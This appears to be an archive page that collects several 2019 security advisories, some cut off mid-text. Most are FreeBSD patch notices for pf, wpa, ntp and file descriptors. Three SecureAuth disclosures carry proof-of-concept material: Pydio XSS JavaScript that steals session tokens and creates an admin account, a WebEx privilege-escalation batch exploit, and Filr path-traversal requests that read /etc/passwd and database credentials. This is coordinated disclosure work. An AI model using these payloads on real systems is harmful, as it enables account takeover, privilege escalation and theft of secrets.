Credits:Synacktiv
Affects:All supported versions of FreeBSD
Corrected:  2019-03-01 18:12:05 UTC (stable/12, 12.0-STABLE)
2019-05-14 23:10:21 UTC (releng/12.0, 12.0-RELEASE-p4)
2019-03-01 18:12:07 UTC (stable/11, 11.3-PRERELEASE)
2019-05-14 23:10:21 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:   CVE-2019-5597

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

pf(4) is an Internet Protocol packet filter originally written for OpenBSD.
In addition to filtering packets, it also has packet normalization
capabilities.

II.  Problem Description

A bug in the pf(4) IPv6 fragment reassembly logic incorrectly uses the last
extension header offset from the last received packet instead of from the
first packet.

III. Impact

Malicious IPv6 packets with different IPv6 extensions could cause a kernel
panic or potentially a filtering rule bypass.

IV.  Workaround

Only systems leveraging the pf(4) firewall and include packet scrubbing using
the recommended 'scrub all in' or similar are affected.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
Afterwards, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:05/pf.patch
# fetch https://security.FreeBSD.org/patches/SA-19:05/pf.patch.asc
# gpg --verify pf.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r344706
releng/12.0/  r347591
stable/11/r344707
releng/11.2/  r347591
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://www.synacktiv.com/ressources/Synacktiv_OpenBSD_PacketFilter_CVE-2019-5597_ipv6_frag.pdf>

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5597>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:05.pf.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlzbTsNfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cL1cxAAjYy90WBfuBkU/FddQWMJkXOn2YqABFxY/BfFpJEbGrnXXuxz9YJByK3b
6ikWq5HcxgL/9ek6QULwEOoNvms8tT4m4waJOLa3hZPoPlgD2ArgvdcEI00R/8T9
Z+k1YlT0oLOY4XbVynPGNmiFNTAcsg7Ognp9yam3kmPZTMGYm6cKIBy1idrzCCmI
nj0SscyoL4Z09kSWe3UOitjh8cpxqGuvGosCb7YGPl6yTSalBUgP44Lyg7jS4nrZ
xjZxqhAfp7tk9peF4rov8apZIsrBF5GMaahnIGIwZzmRn/E1pND9qx1lB1Uh7rfR
nb8OmwbshJTWdnS1GXyLxRGJOd0zmh+YZ10ygZAQTM5sNaxfn6pWJFmr2S/mR+kN
RG/Bhj+lN7jh1eUNdwk/pAm0aZZ+J8GX4/QOrqPfGDko/s/S7YwJB/DKR/14uPY7
Fwcgv4tvgoRstSKHdIe45d7/N0SgQCS/EfzVIO5XPQtkrk9/zalQubionijObr1Q
ARVl7H5M7m7kP8PJz/vRNvhar0c0xTk9ov2JDxKHKTd+7D78LQEAFvEGPIFREBsY
VBW8BqZbuVcsgrhr/YWFE3TEw4O0YbnY5g9wmVv+d/pdDngLuTsfbNEsAQewWcu/
dYefeBMKBukyLUKtLYHjVAhUlL3hF3

FreeBSD Security Advisory FreeBSD-SA-19:06.pf

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:06.pf Security Advisory
  The FreeBSD Project

Topic:  ICMP/ICMP6 packet filter bypass in pf

Category:   contrib
Module: pf
Announced:  2019-05-14
Credits:Synacktiv
Affects:All supported versions of FreeBSD
Corrected:  2019-03-21 14:17:10 UTC (stable/12, 12.0-STABLE)
2019-05-14 23:12:22 UTC (releng/12.0, 12.0-RELEASE-p4)
2019-03-21 14:17:12 UTC (stable/11, 11.3-PRERELEASE)
2019-05-14 23:12:22 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:   CVE-2019-5598

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

pf(4) is an Internet Protocol packet filter originally written for OpenBSD.
In addition to filtering packets, it also has packet normalization
capabilities.

II.  Problem Description

States in pf(4) let ICMP and ICMP6 packets pass if they have a packet in
their payload matching an existing condition.  pf(4) does not check if the
outer ICMP or ICMP6 packet has the same destination IP as the source IP of
the inner protocol packet.

III. Impact

A maliciously crafted ICMP/ICMP6 packet could bypass the packet filter rules
and be passed to a host that would otherwise be unavailable.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
Afterwards, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:06/pf.patch
# fetch https://security.FreeBSD.org/patches/SA-19:06/pf.patch.asc
# gpg --verify pf.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r345377
releng/12.0/  r347593
stable/11/r345378
releng/11.2/  r347593
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://www.synacktiv.com/posts/systems/icmp-reachable.html>

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5598>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:06.pf.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlzbTsdfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cIjXA/9FevC+Ygihzb0J9MN0znEM883dk5sPCSvMwiivsNRkDMXreYqPXU+Fkt0
iV1OZ8tKwKAihm+iGJ5mzS5l40wWF1oDcqJrC0myICdvreraoJKZvTLhgGIBqKkE
b8yIuzPueWdnnudoAzTV38RhyaP2aOb44OMUNPQZsEB/6hHsNvp9m6yAua/F+x9+
N9J38Y/C6udsNfhqDeuCI4G8yiN33XfFiRbF+31rt3s0rUm6KGNsJanJe8dNAEvE
DN4tA4+MORnQ7QTLgOobGuLFhWJ2urC6psH8duO72hcSTzSkTZpxrC3f6SW8RlZ+
Pbr4LZ6FA3bZp/sCmWPOot94hotBDr03MZwrxURokeDHZU1nUBsw0rmTG4aypujl
JrGPOAp89TtqrR0zV8DhpGO/RWoBeMDf7ZGvIplOIEF5rijQWEyC5pnYlBKPfSdm
UTxcN9RoJCfz7O4KLAAqhHiuu6xc+CqlQH1dvyLbqGVv9LzUQlziTNsbQ4cGryuj
g1TztU0VfpvHDkAKBh0iHwkoUqDSut3K19rFAQ3zkM/EodqSTkE1OG77pmsjYaVq
AfcnN/se8lklq0lKi3BwNvVIWTjhMAwY63otVxvVD4wrJrgQH8NKgOeYuGBreXeW
Uv569bIhR0/vsyGJK/SMKxBiAGfzkE7LqDMJqdXLsompX97nOwI=
=m3as
-END PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:03.wpa

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:03.wpaSecurity Advisory
  The FreeBSD Project

Topic:  Multiple vulnerabilities in hostapd and wpa_supplicant

Category:   contrib
Module: wpa
Announced:  2019-05-14
Affects:All supported versions of FreeBSD.
Corrected:  2019-05-01 01:42:38 UTC (stable/12, 12.0-STABLE)
2019-05-14 22:57:29 UTC (releng/12.0, 12.0-RELEASE-p4)
2019-05-01 01:43:17 UTC (stable/11, 11.2-STABLE)
2019-05-14 22:59:32 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:   CVE-2019-9494, CVE-2019-9495, CVE-2019-9496, CVE-2019-9497,
CVE-2019-9498, CVE-2019-9499, CVE-2019-11555

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

Wi-Fi Protected Access II (WPA2) is a security protocol developed by the
Wi-Fi Alliance to secure wireless computer networks.

hostapd(8) and wpa_supplicant(8) are implementations of user space daemon for
access points and wireless client that implements the WPA2 protocol.

II.  Problem Description

Multiple vulnerabilities exist in the hostapd(8) and wpa_supplicant(8)
implementations.  For more details, please see the reference URLs in the
References section below.

III. Impact

Security of the wireless network may be compromised.  For more details,
please see the reference URLS in the References section below.

IV.  Workaround

No workaround is available, but systems not using hostapd(8) or
wpa_supplicant(8) are not affected.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterwards, restart hostapd(8) or wpa_supplicant(8).

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, restart hostapd(8) or wpa_supplicant(8).

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-12.patch.asc
# gpg --verify wpa-12.patch.asc

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-11.patch.asc
# gpg --verify wpa-11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the applicable daemons, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r346980
releng/12.0/  r347587
stable/11/r346981
releng/11.2/  r347588
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://w1.fi/security/2019-1>
https://w1.fi/security/2019-2>
https://w1.fi/security/2019-3>
https://w1.fi/security/2019-4>
https://w1.fi/security/2019-5>

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9494>
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9495>
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9496>
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9497>
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9498>
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9499>
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11555>

The latest revision of this advis

FreeBSD Security Advisory FreeBSD-SA-19:04.ntp

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:04.ntpSecurity Advisory
  The FreeBSD Project

Topic:  Authenticated denial of service in ntpd

Category:   contrib
Module: ntp
Announced:  2019-05-14
Credits:Magnus Stubman
Affects:All supported versions of FreeBSD
Corrected:  2019-03-07 13:45:36 UTC (stable/12, 12.0-STABLE)
2019-05-14 23:02:56 UTC (releng/12.0, 12.0-RELEASE-p4)
2019-03-07 13:45:36 UTC (stable/11, 11.3-PRERELEASE)
2019-05-14 23:06:26 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:   CVE-2019-8936

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

The ntpd(8) daemon is an implementation of the Network Time Protocol
(NTP) used to synchronize the time of a computer system to a reference
time source.  The ntpd(8) daemon uses a protocol called mode 6 to both get
status information from the running ntpd(8) daemon and configure it on the
fly.  This protocol is typically used by the ntpq(8) program, among others.

II.  Problem Description

A crafted malicious authenticated mode 6 packet from a permitted network
address can trigger a NULL pointer dereference.

Note for this attack to work, the sending system must be on an address from
which the target ntpd(8) accepts mode 6 packets, and must use a private key
that is specifically listed as being used for mode 6 authorization.

III. Impact

The ntpd daemon can crash due to the NULL pointer dereference, causing a
denial of service.

IV.  Workaround

Use 'restrict noquery' in the ntpd configuration to limit addresses that
can send mode 6 queries.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, restart the ntpd service:
# service ntpd restart

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp.patch
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp.patch.asc
# gpg --verify ntp.patch.asc

[FreeBSD 11.2-RELEASE/11.3-PRERELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp-11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp-11.2.patch.asc
# gpg --verify ntp-11.2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the ntpd service, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r344884
releng/12.0/  r347589
stable/11/r344884
releng/11.2/  r347590
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

http://support.ntp.org/bin/view/Main/SecurityNotice#March_2019_ntp_4_2_8p13_NTP_Rele>

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:04.ntp.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlzbTrdfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cLGtw/8CNAYnLxARrMUK1QeC9sE7EaboYInSOgaunf

[SAUTH-2019-0002] - Pydio 8 Multiple Vulnerabilities

2019-03-28 Thread SecureAuth Advisories

SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Pydio 8 Multiple Vulnerabilities

1. *Advisory Information*

Title: Pydio 8 Multiple Vulnerabilities
Advisory ID: SAUTH-2019-0002
Advisory URL:
https://www.secureauth.com/labs/advisories/pydio-8-multiple-vulnerabilities
Date published: 2019-03-28
Date of last update: 2019-03-28
Vendors contacted: Pydio
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Argument Injection or Modification [CWE-88], Argument Injection
or Modification [CWE-88], Information Exposure [CWE-200], Improper
Neutralization of Input During Web Page Generation
('Cross-site Scripting') [CWE-79], Information Exposure [CWE-200],
Information Exposure [CWE-200]
Impact: Code execution, Security bypass, Information leak
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2019-10049, CVE-2019-10048, CVE-2019-10045, CVE-2019-10047,
CVE-2019-10046, CVE-2019-10046

3. *Vulnerability Description*
Pydio [1] website states that:
...Pydio, an open source EFSS (Enterprise File Synchronization and
Sharing) solution that can be deployed On-Premise or in a Hybrid / Cloud
environment. Pydio is available either through a Community distribution
(Ideal for home use) that is free forever or an Enterprise which
provides all the features, support and compliance to secure file sharing.
Pydio is sold in more than 25 countries, from Cupertino to Singapore,
and is used by leading brands around the world, such as Nikon, Credit
Agricole, Dexia... Pydio also serves education and government clients,
with major references such as Cambridge University (UK) and ADEME
(France).

Multiple vulnerabilities were found in Pydio 8 (latest version 8.2.2),
which allows an attacker with regular user access to the application and
by tricking an administrator account to open a shared URL bookmark
through the application, to obtain the victim's session identifiers in
order to impersonate him/her and to perform actions such as create a new
user administrator account. After gaining privileged access to the
application the attacker can leverage another vulnerability to perform
OS command injection under the privileges of the user account running
the web server.

4. *Vulnerable Packages*

. Pydio 8.2.2 - Latest version at the time of testing.
. Older versions are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

Pydio published v8.2.3 that fixes all the reported vulnerabilities.

6. *Credits*

These vulnerabilities were discovered and researched by Ramiro Molina
from SecureAuth Security Consulting Services. The publication of this
advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories
Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Privilege escalation vector based in multiple vulnerabilities*

[CVE-2019-10049]
By chaining vulnerabilities it is possible for an attacker with regular
user access to the web application to attempt to trick an administrator
user to open a link shared through the application, that in turn opens a
shared file that contains JavaScript code that is executed in the
context of the victim user to obtain sensitive information such as
session identifiers (session cookie and secure token) and perform
actions on behalf of him/her.

Note: if the targeted users are not administrators, any other action on
behalf of that user could also be achieved, to for example obtain
sensitive files stored in their accounts or impersonate them.

Attack vector steps:

1. Authenticated in the web application with a regular user account, go
to "My Files" and upload a file named for example pydio_xss.html (use
the .html extension) with the following content. The PoC once executed
performs several requests to:

. Obtain a "secure_token" for the user, which is a CSRF prevention token.
. Obtain the session cookie for the current user.
. Send the two sensitive tokens to the attacker, this allows to
impersonate the victim user.
. Change the "context to configuration".
. Create a new user account named "admin99" with password "password1".
. Change the user role of the created user to administrator.

Note: change the IP address and port number (the example ones are the
IP 192.168.56.1 and port ).

PoC pydio_xss.html file:

/-



console.log("Starting...");
var req0 = new XMLHttpRequest();
req0.open('GET', "/welcome/", true);
req0.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
req0.send();
req0.onload  = function() {
var res =  req0.responseText.match(/SECURE_TOKEN.*?,/)[0];
var secure_token = res.split(/"/)[2] ;
var req1 = new XMLHttpRequest();
  req1.open('POST', "index.php", true);
  req1.setRequestHeader('Content-Type',
'application/x-www-form-urlencoded');
  req1.send("get_action=get_sess_id&secure_token=" + secure_token);
  req1.onlo

[CORE-2018-0012] - Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2

2019-02-28 Thread advisories

SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2

1. *Advisory Information*

Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2
Advisory ID: CORE-2018-0012
Advisory URL:
http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability-version-2
Date published: 2019-02-27
Date of last update: 2019-02-27
Vendors contacted: Cisco
Release mode: Coordinated release

2. *Vulnerability Information*

Class: OS command injection [CWE-78]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2019-1674

3. *Vulnerability Description*

Cisco's Webex Meetings website states that [1]:

Cisco Webex Meetings: Simply the Best Video Conferencing and Online
Meetings.
With Cisco Webex Meetings, joining is a breeze, audio and video are
clear, and screen sharing is
easier than ever. We help you forget about the technology, to focus on
what matters.

A vulnerability in the update service of Cisco Webex Meetings Desktop
App for Windows could allow
a local attacker to elevate privileges.

4. *Vulnerable Packages*

. Cisco Webex Meetings Desktop App v33.6.4.15
. Cisco Webex Meetings Desktop App v33.6.5.2
. Cisco Webex Meetings Desktop App v33.7.0.694
. Cisco Webex Meetings Desktop App v33.7.1.15
. Cisco Webex Meetings Desktop App v33.7.2.24
. Cisco Webex Meetings Desktop App v33.7.3.7
. Cisco Webex Meetings Desktop App v33.8.0.779
. Cisco Webex Meetings Desktop App v33.8.1.13
. Cisco Webex Meetings Desktop App v33.8.2.7
. Older versions are probably affected too, but they were
not checked.

5. *Vendor Information, Solutions and Workarounds*

Cisco informed that released the vulnerability is fixed in Cisco Webex
Meetings Desktop App releases 33.6.6 and 33.9.1.

In addition, Cisco published the following advisory:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-wmda-cmdinj

6. *Credits*

This vulnerability was discovered and researched by Marcos Accossatto
from SecureAuth. The publication of this advisory was coordinated by
Leandro Cuozzo from SecureAuth Advisories Team.
7. *Technical Description / Proof of Concept Code*

7.1. *Privilege Escalation*

[CVE-2019-1674]
The update service of Cisco Webex Meetings Desktop App for Windows does
not properly validate version numbers of new files. An unprivileged
local attacker could exploit this vulnerability by invoking the update
service command with a crafted argument and folder. This will allow the
attacker to run arbitrary commands with SYSTEM user privileges.
The vulnerability can be exploited by copying to a local attacker
controller folder, the atgpcdec.dll binary and rename it as atgpcdec.7z.
Then, a previous version of the ptUpdate.exe file must be compressed as
7z and copied to the controller folder. Also, a malicious dll must be
placed in the same folder, named vcruntime140.dll and compressed as
vcruntime140.7z. Finally, a ptUpdate.xml file must be provided in the
controller folder for the update binary (ptUpdate.exe) to treat our
files as a normal update. To gain privileges, the attacker must start
the service with the command line:
sc start webexservice WebexService 1 989898 "attacker-controlled-path"
Proof of Concept:

The following proof of concept performs a 2 step attack, since starting
from version 33.8.X, the application enforces the checking of signatures
for all the downloaded binaries. This 2 step attack works against all
the mentioned vulnerable packages. Notice that you'll need the previous
versions of the ptUpdate.exe executable. Those versions are:
3307.1.1811.1500 for the first step and 3306.4.1811.1600 for the last
step. To exploit version priot to 33.8.X, only one step is required
(the last step in this PoC).

Batch file:
/-
@echo off
REM Contents of PoC.bat
REM
REM This batch file will exploit CVE-2019-1674
REM
REM First, it will copy the atgpcdec.dll file from the installation
REM folder to the current folder as atgpcdec.7z. Then, it will backup
REM ptUpdate.exe and vcruntime140.dll files from the installation folder
REM in the current folder, adding .bak to their names. Keep in mind that
REM those files will be replaced (especially, vcruntime140.dll) and if
REM not restored, will render the application useless.
REM
REM The executable ptUpdate.exe version 3307.1.1811.1500 must be
REM compressed as ptUpdate0.7z and present in the current folder.
REM The executable ptUpdate.exe version 3306.4.1811.1600 must be
REM compressed as ptUpdate1.7z and present in the current folder.
REM Both can be generated using 7zip GUI and compressing as 7z, with
REM normal compression level and LZMA compression method.
REM Another way is to compress both files using the command line app:
REM
REM 7z.exe a ptUpdate0.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21
REM
REM ptUpdate0.xml file will be used in the first stage of the atta

[SAUTH-2019-0001] - Micro Focus Filr Multiple Vulnerabilities

2019-02-20 Thread advisories

SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Micro Focus Filr Multiple Vulnerabilities

1. *Advisory Information*

Title: Micro Focus Filr Multiple Vulnerabilities
Advisory ID: SAUTH-2019-0001
Advisory URL:
https://www.secureauth.com/labs/advisories/micro-focus-filr-multiple-vulnerabilities
Date published: 2019-02-20
Date of last update: 2019-02-20
Vendors contacted: Micro Focus
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Path traversal [CWE-22], Permissions, Privileges, and Access
Control [CWE-264]
Impact: Security bypass, Information leak
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2019-3474, CVE-2019-3475

3. *Vulnerability Description*

Novell (now part of Micro Focus [1]) website states that:
Micro Focus Filr [2] provides file access and sharing, and lets users
access their home directories and network folders from desktops, mobile
devices, and the Web. Users can also synchronize their files to their PC
or Mac. Changes that they make to downloaded copies are kept in sync
with the originals on their network file servers. And finally, users can
also share files internally and externally, and those with the share can
collaborate with each other by commenting on the files.

A vulnerability was found in the Micro Focus Filr Appliance, which would
allow an attacker with regular user access to read arbitrary files of
the filesystem. Furthermore, a vulnerability in the famtd daemon could
allow a local attacker to elevate privileges.

4. *Vulnerable Packages*

. Micro Focus Filr 3.4.0.217.
. Older versions are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

Micro Focus released Filr 3.0 Security Update 6 that addresses the
reported issues: https://download.novell.com/Download?buildid=nZUCSDkvpxk~

Also, Micro Focus published the following Security Notes:

. https://support.microfocus.com/kb/doc.php?id=7023726
. https://support.microfocus.com/kb/doc.php?id=7023727

6. *Credits*

These vulnerabilities were discovered and researched by Matias Choren
from SecureAuth. The publication of this advisory was coordinated by
Leandro Cuozzo from SecureAuth Advisories Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Path Traversal*

[CVE-2019-3474]
The 'filename' parameter of the '/ssf/f/viewFile' endpoint is vulnerable
to Path Traversal attacks. An authenticated, low-privileged user may be
able to abuse this functionality in order to read arbitrary files on the
filesystem.

Proof of Concept:


1. As an authenticated user, upload a sample PDF file in the 'My Files'
section.
2. After the upload finishes, click on the small arrow next to the file
-> 'View Details'.
3. The browser will issue a few requests to the web application, one of
them being the one used for displaying the thumbnail of the file we've
just uploaded. This request has the following structure:

/-
GET
/ssf/s/viewFile?binderId=44=1=folderEntry=8a82ada06851d92d016852b727f26b1b=image=t154758084657912375035546628304890001.jpg
-/

4. If the 'viewType' parameter is set to 'image', as in this case, we
can escape the current directory and include arbitrary files, as long as
they are readable by the 'wwwrun' user (the user Apache Tomcat is
currently running as). For example, we could read the '/etc/passwd' file:

/-
GET
/ssf/s/viewFile?binderId=44=1=folderEntry=8a82ada06851d92d016852b727f26b1b=image=../../../../../../../../../../../etc/passwd
HTTP/1.1
Host: 10.2.45.32:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=803689DA9BA5DA9CBA2B7DD246A50531
Connection: close
-/

/-
HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-UA-Compatible: IE=Edge
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Strict-Transport-Security: max-age=0
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Type: image/jpeg
Date: Mon, 21 Jan 2019 14:53:37 GMT
Connection: close
Server: Filr
Content-Length: 1506

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash

<...>
-/

5. Also, an interesting file to look for would be
'/vastorage/conf/vaconfig.zip'. This zip file contains a bunch of
different configuration files, including 'mysql-liquibase.properties'
which, among other things, defines connection parameters such as the
username and password (base64 encoded) for the MySQL database:

/-
referencePassword==?UTF-8?B?Zmlscg==?=
referenceUrl=jdbc:mysql://localhost:3306/filr?useUnicode=truecharacterEncoding=UTF-8
url=jdbc:mysql://localhost:3306/filr?useUnicode=truecharacterEncoding=UTF-8
password==?UTF-8?B?Zmlscg==?=
driver=com.mysql.jdbc.Driver
referenceUsername=filr
referenceDriver=com.mysql.jdbc.Driver
username=filr
-/

7.2. *Local Privilege Escalation*

[CVE-2019-3475]
As per the description: 'novell-famtd provide CIFS & NCP file access
sup

FreeBSD Security Advisory FreeBSD-SA-19:02.fd

2019-02-05 Thread FreeBSD Security Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:02.fd Security Advisory
  The FreeBSD Project

Topic:  File description reference count leak

Category:   core
Module: unix
Announced:  2019-02-05
Credits:Peter Holm
Affects:FreeBSD 12.0
Corrected:  2019-02-05 17:56:22 UTC (stable/12, 12.0-STABLE)
2019-02-05 18:11:15 UTC (releng/12.0, 12.0-RELEASE-p3)
2019-02-05 17:57:30 UTC (stable/11, 11.2-STABLE)
CVE Name:   CVE-2019-5596

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

UNIX-domain sockets are used for inter-process communication.  It is
possible to use UNIX-domain sockets to transfer rights, encoded as file
descriptors, to another process.

II.  Problem Description

